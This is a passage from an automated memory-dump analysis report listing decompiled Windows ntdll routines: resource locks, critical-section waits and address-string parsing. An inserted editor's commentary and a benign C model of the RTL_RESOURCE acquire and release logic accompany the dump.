                                                              0x02050581
                                                              0x02050583
                                                              0x02072178
                                                              0x00000000
                                                              0x02050589
                                                              0x0205058f
                                                              0x0205058f
                                                              0x02050583
                                                              0x00000000

                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02072206
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-4236105082
                                                              • Opcode ID: 7f0a36b984cbd0cd0215f6dd876d8aa098fa6c65ef34c017d0e2f88e466beaa9
                                                              • Instruction ID: 097e49719ffc325ea1b42b744fe94e52887e501acb84db9ca3b4e43b5509363a
                                                              • Opcode Fuzzy Hash: 7f0a36b984cbd0cd0215f6dd876d8aa098fa6c65ef34c017d0e2f88e466beaa9
                                                              • Instruction Fuzzy Hash: 00510871B403116FEB55CB18CCC1FA633EAAB98710F218259ED55DF285DA31EC42AB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 64%
                                                              			E020514C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                              				signed int _v8;
                                                              				char _v10;
                                                              				char _v140;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t24;
                                                              				void* _t26;
                                                              				signed int _t29;
                                                              				signed int _t34;
                                                              				signed int _t40;
                                                              				intOrPtr _t45;
                                                              				void* _t51;
                                                              				intOrPtr* _t52;
                                                              				void* _t54;
                                                              				signed int _t57;
                                                              				void* _t58;
                                                              
                                                              				_t51 = __edx;
                                                              				_t24 =  *0x20f2088; // 0x761d41cf
                                                              				_v8 = _t24 ^ _t57;
                                                              				_t45 = _a16;
                                                              				_t53 = _a4;
                                                              				_t52 = _a20;
                                                              				if(_a4 == 0 || _t52 == 0) {
                                                              					L10:
                                                              					_t26 = 0xc000000d;
                                                              				} else {
                                                              					if(_t45 == 0) {
                                                              						if( *_t52 == _t45) {
                                                              							goto L3;
                                                              						} else {
                                                              							goto L10;
                                                              						}
                                                              					} else {
                                                              						L3:
                                                              						_t28 =  &_v140;
                                                              						if(_a12 != 0) {
                                                              							_push("[");
                                                              							_push(0x41);
                                                              							_push( &_v140);
                                                              							_t29 = E02047707();
                                                              							_t58 = _t58 + 0xc;
                                                              							_t28 = _t57 + _t29 * 2 - 0x88;
                                                              						}
                                                              						_t54 = E020513CB(_t53, _t28);
                                                              						if(_a8 != 0) {
                                                              							_t34 = E02047707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                              							_t58 = _t58 + 0x10;
                                                              							_t54 = _t54 + _t34 * 2;
                                                              						}
                                                              						if(_a12 != 0) {
                                                              							_t40 = E02047707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                              							_t58 = _t58 + 0x10;
                                                              							_t54 = _t54 + _t40 * 2;
                                                              						}
                                                              						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                              						 *_t52 = _t53;
                                                              						if( *_t52 < _t53) {
                                                              							goto L10;
                                                              						} else {
                                                              							E02012340(_t45,  &_v140, _t53 + _t53);
                                                              							_t26 = 0;
                                                              						}
                                                              					}
                                                              				}
                                                              				return E0201E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                              			}

                                                              APIs
                                                              • ___swprintf_l.LIBCMT ref: 0207EA22
                                                                • Part of subcall function 020513CB: ___swprintf_l.LIBCMT ref: 0205146B
                                                                • Part of subcall function 020513CB: ___swprintf_l.LIBCMT ref: 02051490
                                                              • ___swprintf_l.LIBCMT ref: 0205156D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              • Opcode ID: a0a66718372ea677bcb144ba8fceddfcf6a92cde87e4f87524f1f80ac562a2df
                                                              • Instruction ID: ade23c89b11aa6fd560e456ad6a042d140bb578c66bc9abd25c5de5981d2d709
                                                              • Opcode Fuzzy Hash: a0a66718372ea677bcb144ba8fceddfcf6a92cde87e4f87524f1f80ac562a2df
                                                              • Instruction Fuzzy Hash: EF219172900329EBDB61DE58CC40BEFB3BDEB10704F444565EC4AE3140EB70AA589BE1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 45%
                                                              			E020353A5(signed int _a4, char _a8) {
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t32;
                                                              				signed int _t37;
                                                              				signed int _t40;
                                                              				signed int _t42;
                                                              				void* _t45;
                                                              				intOrPtr _t46;
                                                              				void* _t48;
                                                              				signed int _t49;
                                                              				void* _t51;
                                                              				signed int _t57;
                                                              				signed int _t64;
                                                              				signed int _t71;
                                                              				void* _t74;
                                                              				intOrPtr _t78;
                                                              				signed int* _t79;
                                                              				void* _t85;
                                                              				signed int _t86;
                                                              				signed int _t92;
                                                              				void* _t104;
                                                              				void* _t105;
                                                              
                                                              				_t64 = _a4;
                                                              				_t32 =  *(_t64 + 0x28);
                                                              				_t71 = _t64 + 0x28;
                                                              				_push(_t92);
                                                              				if(_t32 < 0) {
                                                              					_t78 =  *[fs:0x18];
                                                              					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                              					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                              						goto L3;
                                                              					} else {
                                                              						__eflags = _t32 | 0xffffffff;
                                                              						asm("lock xadd [ecx], eax");
                                                              						return 1;
                                                              					}
                                                              				} else {
                                                              					L3:
                                                              					_push(_t86);
                                                              					while(1) {
                                                              						L4:
                                                              						__eflags = _t32;
                                                              						if(_t32 == 0) {
                                                              							break;
                                                              						}
                                                              						__eflags = _a8;
                                                              						if(_a8 == 0) {
                                                              							__eflags = 0;
                                                              							return 0;
                                                              						} else {
                                                              							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                              							_t79 = _t64 + 0x24;
                                                              							_t71 = 1;
                                                              							asm("lock xadd [eax], ecx");
                                                              							_t32 =  *(_t64 + 0x28);
                                                              							_a4 = _t32;
                                                              							__eflags = _t32;
                                                              							if(_t32 != 0) {
                                                              								L19:
                                                              								_t86 = 0;
                                                              								__eflags = 0;
                                                              								while(1) {
                                                              									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                              									asm("sbb esi, esi");
                                                              									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x020f01c0;
                                                              									_push(_t92);
                                                              									_push(0);
                                                              									_t37 = E0200F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                              									__eflags = _t37 - 0x102;
                                                              									if(_t37 != 0x102) {
                                                              										break;
                                                              									}
                                                              									_t71 =  *(_t92 + 4);
                                                              									_t85 =  *_t92;
                                                              									_t51 = E02054FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                              									_push(_t85);
                                                              									_push(_t51);
                                                              									E02063F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                              									E02063F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                              									_t86 = _t86 + 1;
                                                              									_t105 = _t104 + 0x28;
                                                              									__eflags = _t86 - 2;
                                                              									if(__eflags > 0) {
                                                              										E0209217A(_t71, __eflags, _t64);
                                                              									}
                                                              									_push("RTL: Re-Waiting\n");
                                                              									_push(0);
                                                              									_push(0x65);
                                                              									E02063F92();
                                                              									_t104 = _t105 + 0xc;
                                                              								}
                                                              								__eflags = _t37;
                                                              								if(__eflags < 0) {
                                                              									_push(_t37);
                                                              									E02053915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                              									asm("int3");
                                                              									_t40 =  *_t71;
                                                              									 *_t71 = 0;
                                                              									__eflags = _t40;
                                                              									if(_t40 == 0) {
                                                              										L1:
                                                              										_t42 = E02035384(_t92 + 0x24);
                                                              										if(_t42 != 0) {
                                                              											goto L31;
                                                              										} else {
                                                              											goto L2;
                                                              										}
                                                              									} else {
                                                              										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                              										_push( &_a4);
                                                              										_push(_t40);
                                                              										_t49 = E0200F970( *((intOrPtr*)(_t92 + 0x18)));
                                                              										__eflags = _t49;
                                                              										if(__eflags >= 0) {
                                                              											goto L1;
                                                              										} else {
                                                              											_push(_t49);
                                                              											E02053915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                              											L31:
                                                              											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                              											_push( &_a4);
                                                              											_push(1);
                                                              											_t42 = E0200F970( *((intOrPtr*)(_t92 + 0x20)));
                                                              											__eflags = _t42;
                                                              											if(__eflags >= 0) {
                                                              												L2:
                                                              												return _t42;
                                                              											} else {
                                                              												_push(_t42);
                                                              												E02053915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                              												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                              												_push( &_a4);
                                                              												_push(1);
                                                              												_t42 = E0200F970( *((intOrPtr*)(_t92 + 0x20)));
                                                              												__eflags = _t42;
                                                              												if(__eflags >= 0) {
                                                              													goto L2;
                                                              												} else {
                                                              													_push(_t42);
                                                              													_t45 = E02053915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                              													asm("int3");
                                                              													while(1) {
                                                              														_t74 = _t45;
                                                              														__eflags = _t45 - 1;
                                                              														if(_t45 != 1) {
                                                              															break;
                                                              														}
                                                              														_t86 = _t86 | 0xffffffff;
                                                              														_t45 = _t74;
                                                              														asm("lock cmpxchg [ebx], edi");
                                                              														__eflags = _t45 - _t74;
                                                              														if(_t45 != _t74) {
                                                              															continue;
                                                              														} else {
                                                              															_t46 =  *[fs:0x18];
                                                              															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                              															return _t46;
                                                              														}
                                                              														goto L38;
                                                              													}
                                                              													E02035329(_t74, _t92);
                                                              													_push(1);
                                                              													_t48 = E020353A5(_t92);
                                                              													return _t48;
                                                              												}
                                                              											}
                                                              										}
                                                              									}
                                                              								} else {
                                                              									_t32 =  *(_t64 + 0x28);
                                                              									continue;
                                                              								}
                                                              							} else {
                                                              								_t71 =  *_t79;
                                                              								__eflags = _t71;
                                                              								if(__eflags > 0) {
                                                              									while(1) {
                                                              										_t57 = _t71;
                                                              										asm("lock cmpxchg [edi], esi");
                                                              										__eflags = _t57 - _t71;
                                                              										if(_t57 == _t71) {
                                                              											break;
                                                              										}
                                                              										_t71 = _t57;
                                                              										__eflags = _t57;
                                                              										if(_t57 > 0) {
                                                              											continue;
                                                              										}
                                                              										break;
                                                              									}
                                                              									_t32 = _a4;
                                                              									__eflags = _t71;
                                                              								}
                                                              								if(__eflags != 0) {
                                                              									continue;
                                                              								} else {
                                                              									goto L19;
                                                              								}
                                                              							}
                                                              						}
                                                              						goto L38;
                                                              					}
                                                              					_t71 = _t71 | 0xffffffff;
                                                              					_t32 = 0;
                                                              					asm("lock cmpxchg [edx], ecx");
                                                              					__eflags = 0;
                                                              					if(0 != 0) {
                                                              						goto L4;
                                                              					} else {
                                                              						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                              						return 1;
                                                              					}
                                                              				}
                                                              				L38:
                                                              			}
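The three "RTL:" strings in this function's Strings list are the debug messages ntdll emits from the slow path of RtlAcquireResourceExclusive, and the fields the code touches on the object passed in _a4 (+0x24 bumped with lock xadd before a wait, +0x28 flipped from 0 to -1 with lock cmpxchg, +0x2c written from *[fs:0x18]+0x24, the TEB thread id, and a flag bit at +0x30 selecting the wait timeout) line up with the public RTL_RESOURCE layout. That identification is the editor's reading of the dump, but it is the triage point for this function: it is library code from the ntdll image mapped into the dumped process region, not logic written by the sample. The C model below is an added illustration, not code from the page, the sample or ntdll; the struct name, function names, the use of a plain integer for the thread id and the single-threaded treatment of the wait path are assumptions made so the decompiled branches can be read against something runnable.

```c
#include <stdatomic.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed model of the RTL_RESOURCE fields the decompiled routine touches
 * (offsets relative to the object passed in _a4):
 *   +0x24 NumberOfWaitingExclusive  (lock xadd +1 before blocking on the semaphore)
 *   +0x28 NumberOfActive            (0 = free, >0 = shared readers, <0 = -exclusive depth)
 *   +0x2c ExclusiveOwnerThread      (written from *[fs:0x18]+0x24, the TEB thread id)
 * Struct and function names are this illustration's own, not ntdll symbols. */
typedef struct {
    atomic_int number_of_waiting_exclusive; /* +0x24 */
    atomic_int number_of_active;            /* +0x28 */
    uintptr_t  exclusive_owner_thread;      /* +0x2c */
} rtl_resource_model;

static rtl_resource_model g_res;

void reset_model(void)
{
    atomic_store(&g_res.number_of_waiting_exclusive, 0);
    atomic_store(&g_res.number_of_active, 0);
    g_res.exclusive_owner_thread = 0;
}

/* Exclusive recursion depth held right now (0 when free or shared). */
int exclusive_depth(rtl_resource_model *r)
{
    int a = atomic_load(&r->number_of_active);
    return a < 0 ? -a : 0;
}

/* Mirrors the decompiled acquire: returns 1 on success, 0 when the caller
 * would have to block. `self` stands in for the TEB thread id. */
int acquire_exclusive(rtl_resource_model *r, int wait, uintptr_t self)
{
    int active = atomic_load(&r->number_of_active);

    /* Recursive re-entry: NumberOfActive < 0 and we are the owner.
     * Decompiled form: "lock xadd [ecx], eax" with eax = -1, then return 1. */
    if (active < 0 && r->exclusive_owner_thread == self) {
        atomic_fetch_add(&r->number_of_active, -1);
        return 1;
    }

    /* Fast path: "lock cmpxchg [edx], ecx" with ecx = -1 against an expected 0,
     * then store the owner thread id into +0x2c. */
    int expected = 0;
    if (atomic_compare_exchange_strong(&r->number_of_active, &expected, -1)) {
        r->exclusive_owner_thread = self;
        return 1;
    }

    /* Busy. With Wait == FALSE (_a8 == 0) the real routine returns 0 at once. */
    if (!wait)
        return 0;

    /* Wait == TRUE: ntdll bumps NumberOfWaitingExclusive ("lock xadd [eax], ecx",
     * ecx = 1) and parks on ExclusiveSemaphore, printing the "RTL: ... Timeout"
     * and "RTL: Re-Waiting" messages each time the wait times out. A
     * single-threaded model cannot block, so it records the waiter and reports 0. */
    atomic_fetch_add(&r->number_of_waiting_exclusive, 1);
    return 0;
}

/* Drops one level of exclusive ownership; returns the remaining depth,
 * or -1 if the resource was not held exclusively. Waiter wake-up, which the
 * real release performs, is outside this model. */
int release_exclusive(rtl_resource_model *r)
{
    int active = atomic_load(&r->number_of_active);
    if (active >= 0)
        return -1;
    if (active == -1)
        r->exclusive_owner_thread = 0; /* clear owner before the slot becomes visibly free */
    atomic_fetch_add(&r->number_of_active, 1);
    return -(active + 1);
}

int main(void)
{
    reset_model();
    acquire_exclusive(&g_res, 0, 0x1234);
    acquire_exclusive(&g_res, 0, 0x1234);          /* recursive, depth 2 */
    printf("depth after two acquires by the owner: %d\n", exclusive_depth(&g_res));
    printf("other thread, no wait: %d\n", acquire_exclusive(&g_res, 0, 0x5678));
    printf("other thread, wait: %d (waiters=%d)\n",
           acquire_exclusive(&g_res, 1, 0x5678),
           atomic_load(&g_res.number_of_waiting_exclusive));
    release_exclusive(&g_res);
    release_exclusive(&g_res);
    printf("after release, other thread: %d\n", acquire_exclusive(&g_res, 0, 0x5678));
    return 0;
}
```

When reading the rest of this dump, the same test applies: a decompiled function whose strings and field offsets belong to a Windows runtime structure is mapped system code and can be skipped in favour of functions that carry the sample's own strings and C2 logic.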
Instruction address column for the function above (one address per decompiled line, flattened by extraction): code at 0x020353ab-0x020353ea, 0x020505b6-0x020505d5, 0x02069153-0x02069176 and 0x02072269-0x020723d7, with 0x00000000 marking synthesized lines.

                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 020722F4
                                                              Strings
                                                              • RTL: Re-Waiting, xrefs: 02072328
                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 020722FC
                                                              • RTL: Resource at %p, xrefs: 0207230B
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
• Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp
• Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp
• Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp
• Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-871070163
                                                              • Opcode ID: d4a666aec102997ec680b3db3c0381f2f8c32a45c3d3ddf8418ab837ceed538c
                                                              • Instruction ID: cba7b01d8d031cba51416ddc9eb92490642a7cc45a2c6d0cd297ff3301ec1b57
                                                              • Opcode Fuzzy Hash: d4a666aec102997ec680b3db3c0381f2f8c32a45c3d3ddf8418ab837ceed538c
                                                              • Instruction Fuzzy Hash: A051F7B16007166FEB169B24CCC0FE777DDAF58724F104219ED45DB290EB61E841AB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 51%
                                                              			E0203EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                              				intOrPtr _v8;
                                                              				intOrPtr _v12;
                                                              				signed int _v24;
                                                              				intOrPtr* _v28;
                                                              				intOrPtr _v32;
                                                              				signed int _v36;
                                                              				intOrPtr _v40;
                                                              				short _v66;
                                                              				char _v72;
                                                              				void* __esi;
                                                              				intOrPtr _t38;
                                                              				intOrPtr _t39;
                                                              				signed int _t40;
                                                              				intOrPtr _t42;
                                                              				intOrPtr _t43;
                                                              				signed int _t44;
                                                              				void* _t46;
                                                              				intOrPtr _t48;
                                                              				signed int _t49;
                                                              				intOrPtr _t50;
                                                              				intOrPtr _t53;
                                                              				signed char _t67;
                                                              				void* _t72;
                                                              				intOrPtr _t77;
                                                              				intOrPtr* _t80;
                                                              				intOrPtr _t84;
                                                              				intOrPtr* _t85;
                                                              				void* _t91;
                                                              				void* _t92;
                                                              				void* _t93;
                                                              
                                                              				_t80 = __edi;
                                                              				_t75 = __edx;
                                                              				_t70 = __ecx;
                                                              				_t84 = _a4;
                                                              				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                              					E0202DA92(__ecx, __edx, __eflags, _t84);
                                                              					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                              				}
                                                              				_push(0);
                                                              				__eflags = _t38 - 0xffffffff;
                                                              				if(_t38 == 0xffffffff) {
                                                              					_t39 =  *0x20f793c; // 0x0
                                                              					_push(0);
                                                              					_push(_t84);
                                                              					_t40 = E020116C0(_t39);
                                                              				} else {
                                                              					_t40 = E0200F9D4(_t38);
                                                              				}
                                                              				_pop(_t85);
                                                              				__eflags = _t40;
                                                              				if(__eflags < 0) {
                                                              					_push(_t40);
                                                              					E02053915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                              					asm("int3");
                                                              					while(1) {
                                                              						L21:
                                                              						_t76 =  *[fs:0x18];
                                                              						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                              						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                              						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                              							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                              							_v66 = 0x1722;
                                                              							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                              							_t76 =  &_v72;
                                                              							_push( &_v72);
                                                              							_v28 = _t85;
                                                              							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                              							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                              							_push(0x10);
                                                              							_push(0x20402);
                                                              							E020101A4( *0x7ffe0382 & 0x000000ff);
                                                              						}
                                                              						while(1) {
                                                              							_t43 = _v8;
                                                              							_push(_t80);
                                                              							_push(0);
                                                              							__eflags = _t43 - 0xffffffff;
                                                              							if(_t43 == 0xffffffff) {
                                                              								_t71 =  *0x20f793c; // 0x0
                                                              								_push(_t85);
                                                              								_t44 = E02011F28(_t71);
                                                              							} else {
                                                              								_t44 = E0200F8CC(_t43);
                                                              							}
                                                              							__eflags = _t44 - 0x102;
                                                              							if(_t44 != 0x102) {
                                                              								__eflags = _t44;
                                                              								if(__eflags < 0) {
                                                              									_push(_t44);
                                                              									E02053915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                              									asm("int3");
                                                              									E02092306(_t85);
                                                              									__eflags = _t67 & 0x00000002;
                                                              									if((_t67 & 0x00000002) != 0) {
                                                              										_t7 = _t67 + 2; // 0x4
                                                              										_t72 = _t7;
                                                              										asm("lock cmpxchg [edi], ecx");
                                                              										__eflags = _t67 - _t67;
                                                              										if(_t67 == _t67) {
                                                              											E0203EC56(_t72, _t76, _t80, _t85);
                                                              										}
                                                              									}
                                                              									return 0;
                                                              								} else {
                                                              									__eflags = _v24;
                                                              									if(_v24 != 0) {
                                                              										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                              									}
                                                              									return 2;
                                                              								}
                                                              								goto L36;
                                                              							}
                                                              							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                              							_push(_t67);
                                                              							_t46 = E02054FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                              							_push(_t77);
                                                              							E02063F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                              							_t48 =  *_t85;
                                                              							_t92 = _t91 + 0x18;
                                                              							__eflags = _t48 - 0xffffffff;
                                                              							if(_t48 == 0xffffffff) {
                                                              								_t49 = 0;
                                                              								__eflags = 0;
                                                              							} else {
                                                              								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                              							}
                                                              							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                              							_push(_t49);
                                                              							_t50 = _v12;
                                                              							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                              							_push(_t85);
                                                              							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                              							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                              							E02063F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                              							_t53 =  *_t85;
                                                              							_t93 = _t92 + 0x20;
                                                              							_t67 = _t67 + 1;
                                                              							__eflags = _t53 - 0xffffffff;
                                                              							if(_t53 != 0xffffffff) {
                                                              								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                              								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                              							}
                                                              							__eflags = _t67 - 2;
                                                              							if(_t67 > 2) {
                                                              								__eflags = _t85 - 0x20f20c0;
                                                              								if(_t85 != 0x20f20c0) {
                                                              									_t76 = _a4;
                                                              									__eflags = _a4 - _a8;
                                                              									if(__eflags == 0) {
                                                              										E0209217A(_t71, __eflags, _t85);
                                                              									}
                                                              								}
                                                              							}
                                                              							_push("RTL: Re-Waiting\n");
                                                              							_push(0);
                                                              							_push(0x65);
                                                              							_a8 = _a4;
                                                              							E02063F92();
                                                              							_t91 = _t93 + 0xc;
                                                              							__eflags =  *0x7ffe0382;
                                                              							if( *0x7ffe0382 != 0) {
                                                              								goto L21;
                                                              							}
                                                              						}
                                                              						goto L36;
                                                              					}
                                                              				} else {
                                                              					return _t40;
                                                              				}
                                                              				L36:
                                                              			}

                                                              Strings
                                                              • RTL: Re-Waiting, xrefs: 020724FA
                                                              • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0207248D
                                                              • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 020724BD
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                              • API String ID: 0-3177188983
                                                              • Opcode ID: efc392ec06278b2184e28dc27c2587f02ff6d5dca5447b53872518f0fc1cd435
                                                              • Instruction ID: 3debd61edaee847c665a67c3349a461c5cea1ed26ac4330ab07bab560d7a46f3
                                                              • Opcode Fuzzy Hash: efc392ec06278b2184e28dc27c2587f02ff6d5dca5447b53872518f0fc1cd435
                                                              • Instruction Fuzzy Hash: 9C41B2B0A00304AFDB61DB68CC88FAE77F9AF44720F108655FA559B2D0D734E941EBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0204FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                                              				signed int _v8;
                                                              				signed int _v12;
                                                              				signed int _v16;
                                                              				signed int _v20;
                                                              				signed int _v24;
                                                              				signed int _v28;
                                                              				signed int _t105;
                                                              				void* _t110;
                                                              				char _t114;
                                                              				short _t115;
                                                              				void* _t118;
                                                              				signed short* _t119;
                                                              				short _t120;
                                                              				char _t122;
                                                              				void* _t127;
                                                              				void* _t130;
                                                              				signed int _t136;
                                                              				intOrPtr _t143;
                                                              				signed int _t158;
                                                              				signed short* _t164;
                                                              				signed int _t167;
                                                              				void* _t170;
                                                              
                                                              				_t158 = 0;
                                                              				_t164 = _a4;
                                                              				_v20 = 0;
                                                              				_v24 = 0;
                                                              				_v8 = 0;
                                                              				_v12 = 0;
                                                              				_v16 = 0;
                                                              				_v28 = 0;
                                                              				_t136 = 0;
                                                              				while(1) {
                                                              					_t167 =  *_t164 & 0x0000ffff;
                                                              					if(_t167 == _t158) {
                                                              						break;
                                                              					}
                                                              					_t118 = _v20 - _t158;
                                                              					if(_t118 == 0) {
                                                              						if(_t167 == 0x3a) {
                                                              							if(_v12 > _t158 || _v8 > _t158) {
                                                              								break;
                                                              							} else {
                                                              								_t119 =  &(_t164[1]);
                                                              								if( *_t119 != _t167) {
                                                              									break;
                                                              								}
                                                              								_t143 = 2;
                                                              								 *((short*)(_a12 + _t136 * 2)) = 0;
                                                              								_v28 = 1;
                                                              								_v8 = _t143;
                                                              								_t136 = _t136 + 1;
                                                              								L47:
                                                              								_t164 = _t119;
                                                              								_v20 = _t143;
                                                              								L14:
                                                              								if(_v24 == _t158) {
                                                              									L19:
                                                              									_t164 =  &(_t164[1]);
                                                              									_t158 = 0;
                                                              									continue;
                                                              								}
                                                              								if(_v12 == _t158) {
                                                              									if(_v16 > 4) {
                                                              										L29:
                                                              										return 0xc000000d;
                                                              									}
                                                              									_t120 = E0204EE02(_v24, _t158, 0x10);
                                                              									_t170 = _t170 + 0xc;
                                                              									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                                              									_t136 = _t136 + 1;
                                                              									goto L19;
                                                              								}
                                                              								if(_v16 > 3) {
                                                              									goto L29;
                                                              								}
                                                              								_t122 = E0204EE02(_v24, _t158, 0xa);
                                                              								_t170 = _t170 + 0xc;
